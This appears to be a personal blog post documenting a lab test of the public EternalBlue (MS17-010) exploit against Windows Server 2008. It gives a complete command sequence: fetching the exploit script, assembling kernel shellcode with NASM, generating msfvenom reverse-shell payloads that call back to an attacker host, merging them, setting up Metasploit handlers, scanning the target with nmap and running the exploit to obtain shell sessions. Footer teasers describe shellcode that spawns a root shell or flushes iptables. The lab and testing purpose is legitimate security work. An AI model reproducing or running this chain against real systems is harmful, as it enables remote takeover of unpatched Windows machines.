Skip to main content

Eternalblue test for Windows Server Standard 2008 SP1 32bit

This is a test of an Eternalblue exploit script from worawit:
https://github.com/worawit/MS17-010/blob/master/eternalblue_exploit7.py

The script claims to have been tested on:
- Windows 7 SP1 x64  
- Windows 2008 R2 SP1 x64  
- Windows 7 SP1 x86  
- Windows 2008 SP1 x64  
- Windows 2008 SP1 x86

Get the main script:
wget https://github.com/worawit/MS17-010/raw/master/eternalblue_exploit7.py

dos2unix eternalblue_exploit7.py

There is some shellcode required that has to be assembled. I downloaded and installed NASM on a Windows VM.

On my Windows 7 32 bit VM I downloaded the kernel shellcode from:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_kshellcode_x86.asm

I saved the shellcode into a file called:
sc_x86_kernel.asm

The shellcode needs to be in a raw binary form. I should be able to use NASM with the -f bin option to compile the assembly code to a raw binary file.

C:\Users\nc\AppData\Local\bin\NASM\nasm.exe -f bin sc_x86_kernel.asm -o sc_x86_kernel.bin


I copied this sc_x86_kernel.bin file using Filezilla to my Kali box.

Looking at this file:
https://github.com/worawit/MS17-010/blob/master/shellcode/eternalblue_sc_merge.py

It is my understanding that I need to create some shellcode with msfvenom and then concatenate that onto the end of this kernel shellcode.

Creating the Windows 32 bit shellcode using msfvenom:
msfvenom -p windows/shell/reverse_tcp LPORT=443 LHOST=10.10.77.185 --format raw -o sc_x86_msf.bin EXITFUNC=thread

Concatenating the 2 files:
cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin


On my Windows 7 64 bit VM I downloaded the kernel shellcode file from:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_kshellcode_x64.asm

I saved the shellcode into a file called:
sc_x64_kernel.asm

The shellcode needs to be in a raw binary form. I should be able to use NASM with the -f bin option to compile the assembly code to a raw binary file.

C:\exploits\shellcode>C:\Users\nc\AppData\Local\bin\NASM\nasm.exe -f bin sc_x64_kernel.asm -o sc_x64_kernel.bin


I copied this sc_x64_kernel.bin file using Filezilla to my Kali box.

Creating the Windows 64 bit shellcode using msfvenom:
msfvenom -p windows/x64/shell/reverse_tcp LPORT=444 LHOST=10.10.77.185 --format raw -o sc_x64_msf.bin EXITFUNC=thread

Concatenating the 2 files:
cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin


Create the eternalblue_sc_merge.py script with the contents consisting of the first 20 lines from here:
https://raw.githubusercontent.com/worawit/MS17-010/master/shellcode/eternalblue_sc_merge.py

Run the script to create the sc_all.bin file:
python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

The last step is to test this against a vulnerable target.

First we need to set up some multi/handlers to catch the potential reverse connections:
service postgresql start
msfconsole -q
use exploit/multi/handler
set ExitOnSession false
setg LHOST 10.10.77.185
set PAYLOAD windows/x64/shell/reverse_tcp
set EXITFUNC thread
set LPORT 444
exploit -j
...
set PAYLOAD windows/shell/reverse_tcp
set LPORT 443
exploit -j


Ensure that our vulnerable target is running. IP address of the target is:
10.10.77.161

An nmap nse scan result says that the target is vulnerable:
nmap -sS -Pn -n -sV -p 445 --open --min-rate 10 --script smb-vuln-ms17-010 --script-args=unsafe=1 10.10.77.161 -oA "nse_vuln"
...
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
...

Run the script to see if we are in business:
python eternalblue_exploit7.py 10.10.77.161 sc_all.bin

We see something happened on the msfconsole:

Press the Enter key to get a prompt.

Run this to interact with the first session (sessions -l to see what sessions are available):
sessions -i 1


Resources:
NASM http://www.nasm.us/
Windows Server 2008 https://www.microsoft.com/en-ca/download/details.aspx?id=5023
Windows 7 download https://www.microsoft.com/en-ca/software-download/windows7
Kali https://www.kali.org/downloads/


Comments

Post a Comment

Popular posts from this blog

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php Original size: 50 bytes (don't believe what he says :) My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm Published : https://www.exploit-db.com/exploits/41503/ My version: Number of bytes = 47 Number of nulls = 0 PolyFlushIPTables1434.nasm  Intro This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain]               Flush ...
Post a Comment
Read more

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm Published : https://www.exploit-db.com/exploits/41498/ Original Shellcode bytes = 49 My version: Number of bytes = 31 Number of nulls = 0 PolySetuidExecve1434.nasm Intro This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I...
Post a Comment
Read more
GIAC GXPN Review – SANS SEC660 (Advanced Penetration Testing, Exploit Writing, and Ethical Hacking)   Intro  SANS is a well respected and premier cyber security training company that employs industry experts as instructors. GIAC is a company that produces testing to validate the skills of security professionals. GIAC exams validate the learning outcomes of the SANS courses. Prerequisites Before attempting this course you should be familiar with penetration testing as this is an advanced course. I would say that you should also be familiar with assembly language and shellcoding. It would be best if you have studied basic stack overflow exploits prior to this course. You will need a basic understanding of programming in C or C++ (preferably both). Scripting using Python would be a useful prerequisite. If you could learn a bit of Ruby scripting it would help for the Metasploit module creation. Be familiar with various routing and networking protocols. Course Coverage This co...
Post a Comment
Read more